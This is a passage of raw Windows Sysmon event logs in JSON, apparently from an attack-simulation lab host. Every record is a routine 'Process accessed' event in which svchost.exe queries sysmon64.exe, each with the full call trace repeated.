C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 